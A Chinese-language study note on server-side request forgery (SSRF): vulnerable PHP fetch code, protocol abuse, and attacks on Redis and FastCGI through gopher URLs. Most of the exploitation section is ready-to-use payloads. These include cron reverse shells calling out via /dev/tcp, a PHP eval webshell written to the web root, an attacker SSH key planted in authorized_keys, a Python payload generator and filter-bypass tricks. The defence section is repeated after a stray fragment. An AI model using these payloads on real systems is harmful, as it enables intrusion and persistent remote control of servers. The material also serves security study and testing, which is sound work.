服务器端请求伪造笔记

0x00 前言

SSRF，Server-Side Request Forgery，服务端请求伪造，是一种由攻击者构造形成由服务器端发起请求的一个漏洞。一般情况下，SSRF 攻击的目标是从外网无法访问的内部系统。漏洞形成的原因大多是因为服务端提供了从其他服务器应用获取数据的功能且没有对目标地址作过滤和限制。

攻击思路

攻击者可以利用SSRF实现的攻击主要有5种：

• 可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的 banner 信息
• 攻击运行在内网或本地的应用程序（比如溢出）
• 对内网 WEB 应用进行指纹识别，通过访问默认文件实现
• 攻击内外网的 web 应用，主要是使用 GET 参数就可以实现的攻击（比如 Struts2，sqli 等）
• 利用 file 协议读取本地文件等

攻击场景

• 能够对外发起网络请求的地方，就可能存在 SSRF 漏洞
• 从远程服务器请求资源（Upload from URL，Import & Export RSS Feed）
• 数据库内置功能（Oracle、MongoDB、MSSQL、Postgres、CouchDB）
• Webmail 收取其他邮箱邮件（POP3、IMAP、SMTP）
• 文件处理、编码处理、属性信息处理（ffmpeg、ImageMagic、DOCX、PDF、XML）

0x01 前置技能

后端实现

• file_get_contents

  <?php
  if (isset($_POST['url'])) { 
      $content = file_get_contents($_POST['url']); 
      $filename ='./images/'.rand().';img1.jpg'; 
      file_put_contents($filename, $content); 
      echo $_POST['url']; 
      $img = "<img src=\"".$filename."\"/>"; 
  }
  echo $img;
  ?>
  

  这段代码使用 file_get_contents 函数从用户指定的 URL 获取图片。然后把它用一个随机文件名保存在硬盘上，并展示给用户。

• fsockopen()

  <?php 
  function GetFile($host,$port,$link) { 
      $fp = fsockopen($host, intval($port), $errno, $errstr, 30); 
      if (!$fp) { 
          echo "$errstr (error number $errno) \n"; 
      } else { 
          $out = "GET $link HTTP/1.1\r\n"; 
          $out .= "Host: $host\r\n"; 
          $out .= "Connection: Close\r\n\r\n"; 
          $out .= "\r\n"; 
          fwrite($fp, $out); 
          $contents=''; 
          while (!feof($fp)) { 
              $contents.= fgets($fp, 1024); 
          } 
          fclose($fp); 
          return $contents; 
      } 
  }
  ?>
  

  这段代码使用 fsockopen 函数实现获取用户制定 URL 的数据（文件或者 HTML）。这个函数会使用 socket 跟服务器建立 TCP 连接，传输原始数据。

• curl_exec()

  <?php 
  if (isset($_POST['url'])) {
      $link = $_POST['url'];
      $curlobj = curl_init();
      curl_setopt($curlobj, CURLOPT_POST, 0);
      curl_setopt($curlobj,CURLOPT_URL,$link);
      curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
      $result=curl_exec($curlobj);
      curl_close($curlobj);
  
      $filename = './curled/'.rand().'.txt';
      file_put_contents($filename, $result); 
      echo $result;
  }
  ?>
  

  使用 curl 获取数据。

相关协议

• Dict协议

  Dict协议,字典服务器器协议,dict是基于查询响应的TCP协议,它的目标是超越Webster protocol，并允许客户端在使用过程中访问更多字典。Dict服务器和客户机使用TCP端口2628

• Gopher协议

  Gopher协议是互联网上使用的分布型的文件搜集获取网络协议。gopher协议是在HTTP协议出现之前,在internet上常见重用的协议,但是现在已经用的很少了

• File协议

  本地文件传输协议，File协议主要用于访问本地计算机中的文件，就如同在Windows资源管理器中打开文件一样

0x02 漏洞利用

本地利用

root@kali:~# curl -V

file协议查看文件

root@kali:~# curl -v 'file://127.0.0.1/etc/passwd'

dict协议探测端口

root@kali:~# curl -v  'dict://127.0.0.1:6379/info'

gopher协议访问redis反弹shell

root@kali:~# curl -v 'gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a'

远程利用

漏洞代码为ssrf.php

dict协议探测端口

curl -v 'http://a.com/ssrf.php?url=dict://172.0.0.1:22/info'curl -v 'http://a.com/ssrf.php?url=dict://127.0.0.1:6379/info'

gopher协议访问redis反弹shell

curl -v 'http://a.com/ssrf.php?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%2A3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2456%250d%250a%250d%250a%250a%250a%2A%2F1%20%2A%20%2A%20%2A%20%2A%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F127.0.0.1%2F2333%200%3E%261%250a%250a%250a%250d%250a%250d%250a%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2A1%250d%250a%244%250d%250asave%250d%250a%2A1%250d%250a%244%250d%250aquit%250d%250a'

漏洞代码ssrf2.php

<?php
function curl($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
// 限制为HTTPS、HTTP协议
curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}

$url = $_GET['url'];
curl($url);
?>

限制协议HTTP/HTTPS，跳转重定向为true，默认不跳转

这种情况使用dict协议是不行的，但是可以利用302跳转的方式来绕过http协议限制

curl -v "http:///forum.php?mod=ajax&action=downremoteimg&message=[img]http://a.com/302.php?helo.jpg[/img]"

302.php

<?php
header("Location: dict://10.0.0.2:6379/info");#探测redsi信息

Location 302跳转辅助脚本

<?php
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
header("Location: $scheme://$ip:$port/$data");
?>

攻击应用

web ssrf作为跳板可攻击内网多种应用如redis,discuz,fastcgi,memcache,webdav,struts,jboss,axis2等应用

https://github.com/iamultra/ssrfsocks

https://github.com/bcoles/ssrf_proxy

攻击redis

参考链接：浅析Redis中SSRF的利用

绝对路径写webshell

redis命令

flushall
set 1 '<?php eval($_GET["cmd"]);?>'
config set dir /var/www/html
config set dbfilename shell.php
save

转化为redis RESP协议格式

import urllib
protocol="gopher://"
ip="192.168.163.128"
port="6379"
shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save"
     ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
    CRLF="\r\n"
    redis_arr = arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
    cmd+=CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.quote(redis_format(x))
    print payload

生成payload之后，用curl打一波

写ssh公钥

如果.ssh目录存在，则直接写入~/.ssh/authorized_keys 如果不存在，则可以利用crontab创建该目录

redis命令

flushall
set 1 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGd9qrfBQqsml+aGC/PoXsKGFhW3sucZ81fiESpJ+HSk1ILv+mhmU2QNcopiPiTu+kGqJYjIanrQEFbtL+NiWaAHahSO3cgPYXpQ+lW0FQwStEHyDzYOM3Jq6VMy8PSPqkoIBWc7Gsu6541NhdltPGH202M7PfA6fXyPR/BSq30ixoAT1vKKYMp8+8/eyeJzDSr0iSplzhKPkQBYquoiyIs70CTp7HjNwsE2lKf4WV8XpJm7DHSnnnu+1kqJMw0F/3NqhrxYK8KpPzpfQNpkAhKCozhOwH2OdNuypyrXPf3px06utkTp6jvx3ESRfJ89jmuM9y4WozM3dylOwMWjal root@kali
'
config set dir /root/.ssh/
config set dbfilename authorized_keys
save

转化为redis RESP协议格式(第一个脚本改一下)

filename="authorized_keys"
ssh_pub="\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGd9qrfBQqsml+aGC/PoXsKGFhW3sucZ81fiESpJ+HSk1ILv+mhmU2QNcopiPiTu+kGqJYjIanrQEFbtL+NiWaAHahSO3cgPYXpQ+lW0FQwStEHyDzYOM3Jq6VMy8PSPqkoIBWc7Gsu6541NhdltPGH202M7PfA6fXyPR/BSq30ixoAT1vKKYMp8+8/eyeJzDSr0iSplzhKPkQBYquoiyIs70CTp7HjNwsE2lKf4WV8XpJm7DHSnnnu+1kqJMw0F/3NqhrxYK8KpPzpfQNpkAhKCozhOwH2OdNuypyrXPf3px06utkTp6jvx3ESRfJ89jmuM9y4WozM3dylOwMWjal root@kali\n\n"
path="/root/.ssh/"

利用contrab计划任务反弹shell

redis命令

flushall
set 1 '\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.163.132/2333 0>&1\n\n'
config set dir /var/spool/cron/
config set dbfilename root
save

转化为redis RESP协议格式

reverse_ip="192.168.163.132"
reverse_port="2333"
cron="\n\n\n\n*/1 * * * * bash -i >& /dev/tcp/%s/%s 0>&1\n\n\n\n"%(reverse_ip,reverse_port)
filename="root"
path="/var/spool/cron"

nc监听2333端口，再用curl打

nc -lvvp 2333

攻击FastCGI

首先根据faci_exp生成exp，随后改成支持gopher协议的URL

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00

本地监听2333端口，收到反弹shell

0x03 其他问题

能用SSRF攻击的还有很多应用，比如couchDB、Memcache、jboss、axis2、fastcgi、tomcat等等

实际测试以及阅读文章中发现gopher存在以下几点问题

• PHP的curl默认不跟随302跳转
• curl7.43上gopher协议存在%00截断的BUG，v7.49可用
• file_get_contents()的SSRF，gopher协议不能使用URLencode
• file_get_contents()的SSRF，gopher协议的302跳转有BUG会导致利用失败

0x04 bypass

更改IP地址写法

• 8进制格式: 300.
• 16进制格式: 0xc0.0xa8.0.1
• 10进制整数格式: 3232235521
• 16进制整数格式: 0xC0A80001
• 特殊的省略模式: 列入10.0.0.1可写为10.1

利用URL解析问题

在某些情况下,后端程序可能会对访问的URL进行解析,对解析出来的HOST地址进行过滤.如果URL参数解析不当,可能绕过过滤

• http://www.baidu.com@192.168.0.1/与http://192.168.0.1请求的都是192.168.0.1的内容

解释: 后端程序通过不正确的正则表达式（比如将http之后到com为止的字符内容，也就是www.baidu.com，认为是访问请求的host地址时）对上述URL的内容进行解析的时候，很有可能会认为访问URL的host为www.baidu.com，而实际上这个URL所请求的内容都是192.168.0.1上的内容。

• 可以指向任意 ip 的域名xip.io：http://127.0.0.1.xip.io/==>http://127.0.0.1/
• 短地址http://dwz.cn/11SMa==>http://127.0.0.1
• 利用句号。：127。0。0。1==>127.0.0.1

利用302跳转

前提是服务器要允许30x跳转，如果后端服务器在接收到参数后，正确的解析了URL的host，并且进行了过滤，我们这个时候可以使用302跳转的方式来进行绕过。

302跳转 & 短域名

0x05 漏洞防御

• 服务端开启OpenSSL无法交互利用
• 服务端需要认证交互
• 限制协议为HTTP、HTTPS
• 禁止30x跳转次数
• 设置URL白名单或限制内网IP

参考链接

一篇文章深入学习SSRF漏洞

浅析SSRF原理及利用方式

浅析Redis中SSRF的利用

CTF Wiki

.com/))

0x05 漏洞防御

• 服务端开启OpenSSL无法交互利用
• 服务端需要认证交互
• 限制协议为HTTP、HTTPS
• 禁止30x跳转次数
• 设置URL白名单或限制内网IP

参考链接

一篇文章深入学习SSRF漏洞

浅析SSRF原理及利用方式

浅析Redis中SSRF的利用

CTF Wiki